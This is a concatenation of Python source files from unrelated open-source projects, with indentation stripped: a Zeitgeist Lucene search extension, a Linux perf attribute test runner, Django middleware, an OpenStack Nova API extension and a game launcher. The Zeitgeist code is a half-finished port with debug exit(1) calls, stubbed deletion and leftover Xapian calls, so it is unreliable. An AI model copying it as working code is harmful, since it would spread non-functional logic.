FILTER_PREFIX_SUBJECT_MANIFESTATION = "ZGSM"
FILTER_PREFIX_SUBJECT_ORIGIN = "ZGSO"
FILTER_PREFIX_SUBJECT_MIMETYPE = "ZGST"
FILTER_PREFIX_SUBJECT_STORAGE = "ZGSS"
FILTER_PREFIX_XDG_CATEGORY = "AC"
LUCENE_FIELD_CATEGORY = "category"
LUCENE_FIELD_CONTENTS = "contents"
LUCENE_FIELD_APP = "app"
LUCENE_FIELD_TITLE = "title"
LUCENE_FIELD_NAME = "name"
LUCENE_FIELD_SITE = "site"
LUCENE_FIELD_FLAGS = "flags"
VALUE_EVENT_ID = "id"
VALUE_TIMESTAMP = "ms"
# When sorting by of the COALESCING_RESULT_TYPES result types,
# we need to fetch some extra events from the Lucene index because
# the final result set will be coalesced on some property of the event
COALESCING_RESULT_TYPES = [ \
ResultType.MostRecentSubjects,
ResultType.LeastRecentSubjects,
ResultType.MostPopularSubjects,
ResultType.LeastPopularSubjects,
ResultType.MostRecentActor,
ResultType.LeastRecentActor,
ResultType.MostPopularActor,
ResultType.LeastPopularActor,
]
class Deletion:
"""
A marker class that marks an event id for deletion
"""
def __init__ (self, event_id):
self.event_id = event_id
class SearchEngineExtension (Extension, dbus.service.Object):
"""
Full text indexing and searching extension for Zeitgeist
"""
PUBLIC_METHODS = []
def __init__ (self, engine):
Extension.__init__(self, engine)
dbus.service.Object.__init__(self, dbus.SessionBus(),
FTS_DBUS_OBJECT_PATH)
self._indexer = Indexer(self.engine)
def pre_insert_event(self, event, sender):
# Fix when Zeitgeist 0.5.1 hits the street use post_insert_event() instead
self._indexer.index_event (event)
return event
def post_delete_events (self, ids, sender):
for _id in ids:
self._indexer.delete_event (_id)
@dbus.service.method(FTS_DBUS_INTERFACE,
in_signature="s(xx)a("+constants.SIG_EVENT+")uuu",
out_signature="a("+constants.SIG_EVENT+")u")
def Search(self, query_string, time_range, filter_templates, offset, count, result_type):
"""
DBus method to perform a full text search against the contents of the
Zeitgeist log. Returns an array of events.
"""
time_range = TimeRange(time_range[0], time_range[1])
filter_templates = map(Event, filter_templates)
events, hit_count = self._indexer.search(query_string, time_range,
filter_templates,
offset, count, result_type)
return self._make_events_sendable (events), hit_count
def _make_events_sendable(self, events):
for event in events:
if event is not None:
event._make_dbus_sendable()
return [NULL_EVENT if event is None else event for event in events]
def mangle_uri (uri):
"""
Converts a URI into an index- and query friendly string. The problem
is that Xapian doesn't handle CAPITAL letters or most non-alphanumeric
symbols in a boolean term when it does prefix matching. The mangled
URIs returned from this function are suitable for boolean prefix searches.
IMPORTANT: This is a 1-way function! You can not convert back.
"""
result = ""
for c in uri.lower():
if c in (": /"):
result += "_"
else:
result += c
return result
def expand_type (type_prefix, uri):
"""
Return a string with a Xapian query matching all child types of 'uri'
inside the Xapian prefix 'type_prefix'.
"""
is_negation = uri.startswith(NEGATION_OPERATOR)
uri = uri[1:] if is_negation else uri
children = Symbol.find_child_uris_extended(uri)
children = [ "%s:%s" % (type_prefix, child) for child in children ]
result = " OR ".join(children)
return result if not is_negation else "NOT (%s)" % result
class Indexer:
"""
Abstraction of the FT indexer and search engine
"""
def __init__ (self, engine):
self._engine = engine
log.debug("Opening full text index: %s" % INDEX_FILE)
self._analyzer = lucene.StandardAnalyzer(lucene.Version.LUCENE_CURRENT)
self._query_parser = lucene.QueryParser(lucene.Version.LUCENE_CURRENT, "defaultfield", self._analyzer)
self._directory = lucene.FSDirectory.open(INDEX_FILE)
self._maxFieldLength = 10000
self._index = lucene.IndexWriter(self._directory, self._analyzer, self._maxFieldLength)
#TODO
#self._query_parser.add_prefix("name", "N")
#self._query_parser.add_prefix("title", "N")
#self._query_parser.add_prefix("site", "S")
#self._query_parser.add_prefix("app", "A")
#self._query_parser.add_boolean_prefix("zgei", FILTER_PREFIX_EVENT_INTERPRETATION)
#self._query_parser.add_boolean_prefix("zgem", FILTER_PREFIX_EVENT_MANIFESTATION)
#self._query_parser.add_boolean_prefix("zga", FILTER_PREFIX_ACTOR)
#self._query_parser.add_boolean_prefix("zgsi", FILTER_PREFIX_SUBJECT_INTERPRETATION)
#self._query_parser.add_boolean_prefix("zgsm", FILTER_PREFIX_SUBJECT_MANIFESTATION)
#self._query_parser.add_prefix("category", FILTER_PREFIX_XDG_CATEGORY)
#self._query_parser.add_valuerangeprocessor(
# xapian.NumberValueRangeProcessor(VALUE_EVENT_ID, "id", True))
#self._query_parser.add_valuerangeprocessor(
# xapian.NumberValueRangeProcessor(VALUE_TIMESTAMP, "ms", False))
#self._query_parser.set_default_op(xapian.Query.OP_AND)
self._enquire = lucene.IndexSearcher(self._directory)
# Cache of parsed DesktopEntrys
self._desktops = {}
gobject.threads_init()
self._may_run = True
self._queue = Queue(0)
self._worker = threading.Thread(target=self._worker_thread,
name="IndexWorker")
self._worker.daemon = True
self._worker.start()
self._check_index ()
def _check_index (self):
if self._index.numDocs() == 0:
# If the index is empty we trigger a rebuild
# We must delay reindexing until after the engine is done setting up
log.info("Empty index detected. Doing full rebuild")
gobject.idle_add (self._reindex)
def _reindex (self):
"""
Index everything in the ZG log
"""
self._index.close ()
self._index = lucene.IndexWriter(self._directory, self._analyzer, self._maxFieldLength)
all_events = self._engine.find_events(TimeRange.always(),
[], StorageState.Any,
sys.maxint,
ResultType.MostRecentEvents)
log.info("Preparing to index %s events" % len(all_events))
for e in all_events : self._queue.put(e)
def index_event (self, event):
"""
This method schedules and event for indexing. It returns immediate and
defers the actual work to a bottom half thread. This means that it
will not block the main loop of the Zeitgeist daemon while indexing
(which may be a heavy operation)
"""
self._queue.put (event)
return event
def delete_event (self, event_id):
"""
Remove an event from the index given its event id
"""
self._queue.put (Deletion(event_id))
return
def search (self, query_string, time_range=None, filters=None, offset=0, maxhits=10, result_type=100):
"""
Do a full text search over the indexed corpus. The `result_type`
parameter may be a zeitgeist.datamodel.ResultType or 100. In case it is
100 the textual relevancy of the search engine will be used to sort the
results. Result type 100 is the fastest (and default) mode.
The filters argument should be a list of event templates.
"""
print "search %s " % query_string
exit(1)
# Expand event template filters if necessary
if filters:
query_string = "(%s) AND (%s)" % (query_string, self._compile_event_filter_query (filters))
# Expand time range value query
if time_range and not time_range.is_always():
query_string = "(%s) AND (%s)" % (query_string, self._compile_time_range_filter_query (time_range))
# If the result type coalesces the events we need to fetch some extra
# events from the index to have a chance of actually holding 'maxhits'
# unique events
if result_type in COALESCING_RESULT_TYPES:
raw_maxhits = maxhits * 3
else:
raw_maxhits = maxhits
# When not sorting by relevance, we fetch the results from Xapian sorted,
# by timestamp. That minimizes the skew we get from otherwise doing a
# relevancy ranked xapaian query and then resorting with Zeitgeist. The
# "skew" is that low-relevancy results may still have the highest timestamp
if result_type == 100:
self._enquire.set_sort_by_relevance()
else:
self._enquire.set_sort_by_value(VALUE_TIMESTAMP, True)
# Allow wildcards
query_start = time.time()
query = self._query_parser.parse_query (query_string,
self.QUERY_PARSER_FLAGS)
self._enquire.set_query (query)
hits = self._enquire.get_mset (offset, raw_maxhits)
hit_count = hits.get_matches_estimated()
log.debug("Search '%s' gave %s hits in %sms" %
(query_string, hits.get_matches_estimated(), (time.time() - query_start)*1000))
if result_type == 100:
event_ids = []
for m in hits:
event_id = int(xapian.sortable_unserialise(
m.document.get_value(VALUE_EVENT_ID)))
event_ids.append (event_id)
if event_ids:
return self._engine.get_events(ids=event_ids), hit_count
else:
return [], 0
else:
templates = []
for m in hits:
event_id = int(xapian.sortable_unserialise(
m.document.get_value(VALUE_EVENT_ID)))
ev = Event()
ev[0][Event.Id] = str(event_id)
templates.append(ev)
if templates:
return self._engine._find_events(1, TimeRange.always(),
templates,
StorageState.Any,
maxhits,
result_type), hit_count
else:
return [], 0
def _worker_thread (self):
is_dirty = False
while self._may_run:
# FIXME: Throttle IO and CPU
try:
# If we are dirty wait a while before we flush,
# or if we are clean wait indefinitely to avoid
# needless wakeups
if is_dirty:
event = self._queue.get(True, 0.5)
else:
event = self._queue.get(True)
if isinstance (event, Deletion):
self._delete_event_real (event.event_id)
else:
self._index_event_real (event)
is_dirty = True
except Empty:
if is_dirty:
# Write changes to disk
log.debug("Committing FTS index")
self._index.commit()
is_dirty = False
else:
log.debug("No changes to index. Sleeping")
def _delete_event_real (self, event_id):
"""
Look up the doc id given an event id and remove the xapian.Document
for that doc id.
Note: This is slow, but there's not much we can do about it
"""
print "TODO delete"
return
try:
_id = xapian.sortable_serialise(float(event_id))
query = xapian.Query(xapian.Query.OP_VALUE_RANGE,
VALUE_EVENT_ID, _id, _id)
self._enquire.set_query (query)
hits = self._enquire.get_mset (0, 10)
total = hits.get_matches_estimated()
if total > 1:
log.warning ("More than one event found with id '%s'" % event_id)
elif total <= 0:
log.debug ("No event for id '%s'" % event_id)
return
for m in hits:
log.debug("Deleting event '%s' with docid '%s'" %
(event_id, m.docid))
self._index.delete_document(m.docid)
except Exception, e:
log.error("Failed to delete event '%s': %s" % (event_id, e))
def _split_uri (self, uri):
"""
Returns a triple of (scheme, host, and path) extracted from `uri`
"""
i = uri.find(":")
if i == -1 :
scheme = ""
host = ""
path = uri
else:
scheme = uri[:i]
host = ""
path = ""
if uri[i+1] == "/" and uri[i+2] == "/":
j = uri.find("/", i+3)
if j == -1 :
host = uri[i+3:]
else:
host = uri[i+3:j]
path = uri[j:]
else:
host = uri[i+1:]
# Strip out URI query part
i = path.find("?")
if i != -1:
path = path[:i]
return scheme, host, path
def _get_desktop_entry (self, app_id):
"""
Return a xdg.DesktopEntry.DesktopEntry `app_id` or None in case
no file is found for the given desktop id
"""
if app_id in self._desktops:
return self._desktops[app_id]
for datadir in xdg_data_dirs:
path = os.path.join(datadir, "applications", app_id)
if os.path.exists(path):
try:
desktop = DesktopEntry(path)
self._desktops[app_id] = desktop
return desktop
except Exception, e:
log.warning("Unable to load %s: %s" % (path, e))
return None
return None
def _index_actor (self, doc, actor):
"""
Takes an actor as a path to a .desktop file or app:// uri
and index the contents of the corresponding .desktop file
into the document currently set for self._tokenizer.
"""
if not actor : return
# Get the path of the .desktop file and convert it to
# an app id (eg. 'gedit.desktop')
scheme, host, path = self._split_uri(url_unescape (actor))
if not path:
path = host
if not path :
log.debug("Unable to determine application id for %s" % actor)
return
if path.startswith("/") :
path = os.path.basename(path)
desktop = self._get_desktop_entry(path)
if desktop:
if not desktop.getNoDisplay():
f = lucene.Field(LUCENE_FIELD_APP, desktop.getName(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
f = lucene.Field(LUCENE_FIELD_APP, desktop.getGenericName(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
f = lucene.Field(LUCENE_FIELD_APP, desktop.getComment(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
for cat in desktop.getCategories():
doc.add(lucene.Field(LUCENE_FIELD_CATEGORY, cat.lower(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED))
else:
log.debug("Unable to look up app info for %s" % actor)
def _index_uri (self, doc, uri):
"""
Index `uri` into the document currectly set on self._tokenizer
"""
#TODO:
# File URIs and paths are indexed in one way, and all other,
# usually web URIs, are indexed in another way because there may
# be domain name etc. in there we want to rank differently
scheme, host, path = self._split_uri (url_unescape (uri))
if scheme == "file://" or not scheme:
path, name = os.path.split(path)
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, name, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
# Index parent names with descending weight
weight = 5
while path and name:
weight = weight / 1.5
path, name = os.path.split(path)
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(weight)
doc.add(f)
elif scheme == "mailto:":
tokens = host.split("@")
name = tokens[0]
#store as content (TODO?? why is that)
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(6)
doc.add(f)
if len(tokens) > 1:
#TODO: what's this doing???
#self._tokenizer.index_text(" ".join[1:], 1)
pass
else:
# We're cautious about indexing the path components of
# non-file URIs as some websites practice *extremely* long
# and useless URLs
path, name = os.path.split(path)
if len(name) > 30 : name = name[:30]
if len(path) > 30 : path = path[30]
if name:
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, name, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
if path:
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, path, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(1)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, path, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(1)
doc.add(f)
if host:
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, host, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, host, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
#store as site
f = lucene.Field(LUCENE_FIELD_SITE, host, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
def _index_text (self, doc, text):
"""
Index `text` as raw text data for the document currently
set on self._tokenizer. The text is assumed to be a primary
description of the subject, such as the basename of a file.
Primary use is for subject.text
"""
f = lucene.Field(LUCENE_FIELD_CONTENTS, text, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
def _index_contents (self, uri):
# xmlindexer doesn't extract words for URIs only for file paths
# FIXME: IONICE and NICE on xmlindexer
path = uri.replace("file://", "")
xmlindexer = subprocess.Popen(['xmlindexer', path],
stdout=subprocess.PIPE)
xml = xmlindexer.communicate()[0].strip()
xmlindexer.wait()
dom = minidom.parseString(xml)
text_nodes = dom.getElementsByTagName("text")
lines = []
if text_nodes:
for line in text_nodes[0].childNodes:
lines.append(line.data)
if lines:
f = lucene.Field(LUCENE_FIELD_CONTENTS, " ".join(lines), lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
doc.add(f)
def _add_doc_filters (self, event, doc):
"""Adds the filtering rules to the doc. Filtering rules will
not affect the relevancy ranking of the event/doc"""
if event.interpretation:
doc.add(lucene.Field(FILTER_PREFIX_EVENT_INTERPRETATION, event.interpretation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if event.manifestation:
doc.add(lucene.Field(FILTER_PREFIX_EVENT_MANIFESTATION, event.manifestation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if event.actor:
doc.add(lucene.Field(FILTER_PREFIX_ACTOR, mangle_uri(event.actor), lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
for su in event.subjects:
if su.uri:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_URI, mangle_uri(su.uri), lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.interpretation:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_INTERPRETATION, su.interpretation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.manifestation:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_MANIFESTATION, su.manifestation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.origin:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_ORIGIN, mangle_uri(su.origin), lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.mimetype:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_MIMETYPE, su.mimetype, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.storage:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_STORAGE, su.storage, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
def _index_event_real (self, event):
if not isinstance (event, Event):
log.error("Not an Event, found: %s" % type(event))
if not event.id:
log.debug("Not indexing event. Event has no id")
return
try:
doc = lucene.Document()
doc.add(lucene.NumericField(VALUE_EVENT_ID).setLongValue(int(event.id)))
doc.add(lucene.NumericField(VALUE_TIMESTAMP).setLongValue(int(event.timestamp)))
self._index_actor (doc, event.actor)
for subject in event.subjects:
if not subject.uri : continue
# By spec URIs can have arbitrary length. In reality that's just silly.
# The general online "rule" is to keep URLs less than 2k so we just
# choose to enforce that
if len(subject.uri) > 2000:
log.info ("URI too long (%s). Discarding: %s..."% (len(subject.uri), subject.uri[:30]))
continue
log.debug("Indexing '%s'" % subject.uri)
self._index_uri (doc, subject.uri)
self._index_text (doc, subject.text)
# If the subject URI is an actor, we index the .desktop also
if subject.uri.startswith ("application://"):
self._index_actor (doc, subject.uri)
# File contents indexing disabled for now...
#self._index_contents (subject.uri)
# FIXME: Possibly index payloads when we have apriori knowledge
self._add_doc_filters (event, doc)
self._index.addDocument(doc)
except Exception, e:
log.error("Error indexing event: %s" % e)
def _compile_event_filter_query (self, events):
"""Takes a list of event templates and compiles a filter query
based on their, interpretations, manifestations, and actor,
for event and subjects.
All fields within the same event will be ANDed and each template
will be ORed with the others. Like elsewhere in Zeitgeist the
type tree of the interpretations and manifestations will be expanded
to match all child symbols as well
"""
print "_compile_event_filter_query"
exit(1)
query = []
for event in events:
if not isinstance(event, Event):
raise TypeError("Expected Event. Found %s" % type(event))
tmpl = []
if event.interpretation :
tmpl.append(expand_type("zgei", event.interpretation))
if event.manifestation :
tmpl.append(expand_type("zgem", event.manifestation))
if event.actor : tmpl.append("zga:%s" % mangle_uri(event.actor))
for su in event.subjects:
if su.uri :
tmpl.append("zgsu:%s" % mangle_uri(su.uri))
if su.interpretation :
tmpl.append(expand_type("zgsi", su.interpretation))
if su.manifestation :
tmpl.append(expand_type("zgsm", su.manifestation))
if su.origin :
tmpl.append("zgso:%s" % mangle_uri(su.origin))
if su.mimetype :
tmpl.append("zgst:%s" % su.mimetype)
if su.storage :
tmpl.append("zgss:%s" % su.storage)
tmpl = "(" + ") AND (".join(tmpl) + ")"
query.append(tmpl)
return " OR ".join(query)
def _compile_time_range_filter_query (self, time_range):
"""Takes a TimeRange and compiles a range query for it"""
print "_compile_time_range_filter_query"
exit(1)
if not isinstance(time_range, TimeRange):
raise TypeError("Expected TimeRange, but found %s" % type(time_range))
return "%s..%sms" % (time_range.begin, time_range.end)
if __name__ == "__main__":
indexer = Indexer(None)
print indexer._compile_filter_query([Event.new_for_values(subject_interpretation="http://www.semanticdesktop.org/ontologies/2007/03/22/nfo#Document")])
|
DrKita/cm14 | refs/heads/master | tools/perf/tests/attr.py | 3174 | #! /usr/bin/python
import os
import sys
import glob
import optparse
import tempfile
import logging
import shutil
import ConfigParser
class Fail(Exception):
def __init__(self, test, msg):
self.msg = msg
self.test = test
def getMsg(self):
return '\'%s\' - %s' % (self.test.path, self.msg)
class Unsup(Exception):
def __init__(self, test):
self.test = test
def getMsg(self):
return '\'%s\'' % self.test.path
class Event(dict):
terms = [
'cpu',
'flags',
'type',
'size',
'config',
'sample_period',
'sample_type',
'read_format',
'disabled',
'inherit',
'pinned',
'exclusive',
'exclude_user',
'exclude_kernel',
'exclude_hv',
'exclude_idle',
'mmap',
'comm',
'freq',
'inherit_stat',
'enable_on_exec',
'task',
'watermark',
'precise_ip',
'mmap_data',
'sample_id_all',
'exclude_host',
'exclude_guest',
'exclude_callchain_kernel',
'exclude_callchain_user',
'wakeup_events',
'bp_type',
'config1',
'config2',
'branch_sample_type',
'sample_regs_user',
'sample_stack_user',
]
def add(self, data):
for key, val in data:
log.debug(" %s = %s" % (key, val))
self[key] = val
def __init__(self, name, data, base):
log.debug(" Event %s" % name);
self.name = name;
self.group = ''
self.add(base)
self.add(data)
def compare_data(self, a, b):
# Allow multiple values in assignment separated by '|'
a_list = a.split('|')
b_list = b.split('|')
for a_item in a_list:
for b_item in b_list:
if (a_item == b_item):
return True
elif (a_item == '*') or (b_item == '*'):
return True
return False
def equal(self, other):
for t in Event.terms:
log.debug(" [%s] %s %s" % (t, self[t], other[t]));
if not self.has_key(t) or not other.has_key(t):
return False
if not self.compare_data(self[t], other[t]):
return False
return True
def diff(self, other):
for t in Event.terms:
if not self.has_key(t) or not other.has_key(t):
continue
if not self.compare_data(self[t], other[t]):
log.warning("expected %s=%s, got %s" % (t, self[t], other[t]))
# Test file description needs to have following sections:
# [config]
# - just single instance in file
# - needs to specify:
# 'command' - perf command name
# 'args' - special command arguments
# 'ret' - expected command return value (0 by default)
#
# [eventX:base]
# - one or multiple instances in file
# - expected values assignments
class Test(object):
def __init__(self, path, options):
parser = ConfigParser.SafeConfigParser()
parser.read(path)
log.warning("running '%s'" % path)
self.path = path
self.test_dir = options.test_dir
self.perf = options.perf
self.command = parser.get('config', 'command')
self.args = parser.get('config', 'args')
try:
self.ret = parser.get('config', 'ret')
except:
self.ret = 0
self.expect = {}
self.result = {}
log.debug(" loading expected events");
self.load_events(path, self.expect)
def is_event(self, name):
if name.find("event") == -1:
return False
else:
return True
def load_events(self, path, events):
parser_event = ConfigParser.SafeConfigParser()
parser_event.read(path)
# The event record section header contains 'event' word,
# optionaly followed by ':' allowing to load 'parent
# event' first as a base
for section in filter(self.is_event, parser_event.sections()):
parser_items = parser_event.items(section);
base_items = {}
# Read parent event if there's any
if (':' in section):
base = section[section.index(':') + 1:]
parser_base = ConfigParser.SafeConfigParser()
parser_base.read(self.test_dir + '/' + base)
base_items = parser_base.items('event')
e = Event(section, parser_items, base_items)
events[section] = e
def run_cmd(self, tempdir):
cmd = "PERF_TEST_ATTR=%s %s %s -o %s/perf.data %s" % (tempdir,
self.perf, self.command, tempdir, self.args)
ret = os.WEXITSTATUS(os.system(cmd))
log.info(" '%s' ret %d " % (cmd, ret))
if ret != int(self.ret):
raise Unsup(self)
def compare(self, expect, result):
match = {}
log.debug(" compare");
# For each expected event find all matching
# events in result. Fail if there's not any.
for exp_name, exp_event in expect.items():
exp_list = []
log.debug(" matching [%s]" % exp_name)
for res_name, res_event in result.items():
log.debug(" to [%s]" % res_name)
if (exp_event.equal(res_event)):
exp_list.append(res_name)
log.debug(" ->OK")
else:
log.debug(" ->FAIL");
log.debug(" match: [%s] matches %s" % (exp_name, str(exp_list)))
# we did not any matching event - fail
if (not exp_list):
exp_event.diff(res_event)
raise Fail(self, 'match failure');
match[exp_name] = exp_list
# For each defined group in the expected events
# check we match the same group in the result.
for exp_name, exp_event in expect.items():
group = exp_event.group
if (group == ''):
continue
for res_name in match[exp_name]:
res_group = result[res_name].group
if res_group not in match[group]:
raise Fail(self, 'group failure')
log.debug(" group: [%s] matches group leader %s" %
(exp_name, str(match[group])))
log.debug(" matched")
def resolve_groups(self, events):
for name, event in events.items():
group_fd = event['group_fd'];
if group_fd == '-1':
continue;
for iname, ievent in events.items():
if (ievent['fd'] == group_fd):
event.group = iname
log.debug('[%s] has group leader [%s]' % (name, iname))
break;
def run(self):
tempdir = tempfile.mkdtemp();
try:
# run the test script
self.run_cmd(tempdir);
# load events expectation for the test
log.debug(" loading result events");
for f in glob.glob(tempdir + '/event*'):
self.load_events(f, self.result);
# resolve group_fd to event names
self.resolve_groups(self.expect);
self.resolve_groups(self.result);
# do the expectation - results matching - both ways
self.compare(self.expect, self.result)
self.compare(self.result, self.expect)
finally:
# cleanup
shutil.rmtree(tempdir)
def run_tests(options):
for f in glob.glob(options.test_dir + '/' + options.test):
try:
Test(f, options).run()
except Unsup, obj:
log.warning("unsupp %s" % obj.getMsg())
def setup_log(verbose):
global log
level = logging.CRITICAL
if verbose == 1:
level = logging.WARNING
if verbose == 2:
level = logging.INFO
if verbose >= 3:
level = logging.DEBUG
log = logging.getLogger('test')
log.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
formatter = logging.Formatter('%(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
USAGE = '''%s [OPTIONS]
-d dir # tests dir
-p path # perf binary
-t test # single test
-v # verbose level
''' % sys.argv[0]
def main():
parser = optparse.OptionParser(usage=USAGE)
parser.add_option("-t", "--test",
action="store", type="string", dest="test")
parser.add_option("-d", "--test-dir",
action="store", type="string", dest="test_dir")
parser.add_option("-p", "--perf",
action="store", type="string", dest="perf")
parser.add_option("-v", "--verbose",
action="count", dest="verbose")
options, args = parser.parse_args()
if args:
parser.error('FAILED wrong arguments %s' % ' '.join(args))
return -1
setup_log(options.verbose)
if not options.test_dir:
print 'FAILED no -d option specified'
sys.exit(-1)
if not options.test:
options.test = 'test*'
try:
run_tests(options)
except Fail, obj:
print "FAILED %s" % obj.getMsg();
sys.exit(-1)
sys.exit(0)
if __name__ == '__main__':
main()
|
JanMalte/secondhandshop_server | refs/heads/master | src/shs_auth/middleware.py | 1 | """
Second-Hand-Shop Project
@author: Malte Gerth
@copyright: Copyright (C) 2015 Malte Gerth
@license: MIT
@maintainer: Malte Gerth
@email: mail@malte-gerth.de
"""
import pytz
from django.shortcuts import redirect
from django.utils import timezone
from events.models import get_active_event
from shs_auth.models import MemberStatus
__author__ = "Malte Gerth <mail@malte-gerth.de>"
__copyright__ = "Copyright (C) 2015 Malte Gerth"
__license__ = "MIT"
class TimezoneMiddleware(object):
def process_request(self, request):
if hasattr(request, "user"):
tzname = getattr(request.user, "timezone", None)
else:
tzname = "Europe/Berlin"
if tzname:
timezone.activate(pytz.timezone(tzname))
else:
timezone.deactivate()
class MemberStatusMiddleware(object):
def process_request(self, request):
if request.user.is_anonymous():
return None
if request.user.is_superuser:
return None
if not MemberStatus.objects.filter(
user=request.user, event=get_active_event()
).exists():
from django.core.urlresolvers import resolve
current_url = resolve(request.path_info).url_name
if current_url != "update_member_status":
return redirect("shs_auth:update_member_status")
|
TieWei/nova | refs/heads/enhanced/havana | nova/api/openstack/compute/plugins/v3/extended_availability_zone.py | 15 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Netease, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Extended Availability Zone Status API extension."""
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import availability_zones as avail_zone
ALIAS = "os-extended-availability-zone"
authorize = extensions.soft_extension_authorizer('compute',
'v3:' + ALIAS)
class ExtendedAZController(wsgi.Controller):
def _extend_server(self, context, server, instance):
key = "%s:availability_zone" % ExtendedAvailabilityZone.alias
az = avail_zone.get_instance_availability_zone(context, instance)
if not az and instance.get('availability_zone'):
# Likely hasn't reached a viable compute node yet so give back the
# desired availability_zone that *may* exist in the instance
# record itself.
az = instance['availability_zone']
server[key] = az
@wsgi.extends
def show(self, req, resp_obj, id):
context = req.environ['nova.context']
if authorize(context):
resp_obj.attach(xml=ExtendedAZTemplate())
server = resp_obj.obj['server']
db_instance = req.get_db_instance(server['id'])
self._extend_server(context, server, db_instance)
@wsgi.extends
def detail(self, req, resp_obj):
context = req.environ['nova.context']
if authorize(context):
resp_obj.attach(xml=ExtendedAZsTemplate())
servers = list(resp_obj.obj['servers'])
for server in servers:
db_instance = req.get_db_instance(server['id'])
self._extend_server(context, server, db_instance)
class ExtendedAvailabilityZone(extensions.V3APIExtensionBase):
"""Extended Server Attributes support."""
name = "ExtendedAvailabilityZone"
alias = ALIAS
namespace = ("http://docs.openstack.org/compute/ext/"
"extended_availability_zone/api/v3")
version = 1
def get_controller_extensions(self):
controller = ExtendedAZController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
def get_resources(self):
return []
def make_server(elem):
elem.set('{%s}availability_zone' % ExtendedAvailabilityZone.namespace,
'%s:availability_zone' % ExtendedAvailabilityZone.alias)
class ExtendedAZTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server', selector='server')
make_server(root)
alias = ExtendedAvailabilityZone.alias
namespace = ExtendedAvailabilityZone.namespace
return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})
class ExtendedAZsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('servers')
elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')
make_server(elem)
alias = ExtendedAvailabilityZone.alias
namespace = ExtendedAvailabilityZone.namespace
return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})
|
Insality/argalactic | refs/heads/master | argalactic.py | 1 | # coding: utf-8
__author__ = 'Insality'
from scenes.menu import *
import pyglet
import config
def main():
print("Hello, Argalactic!")
director.init(resizable=True, caption=config.GAME_TITLE, width=config.GAME_WIDTH, height=config.GAME_HEIGHT)
director.window.set_icon(pyglet.image.load('res/icon.png'))
director.window.set_location(300, 0)
menu_scene = Menu()
director.run (menu_scene)
if __name__ == '__main__':
main() |
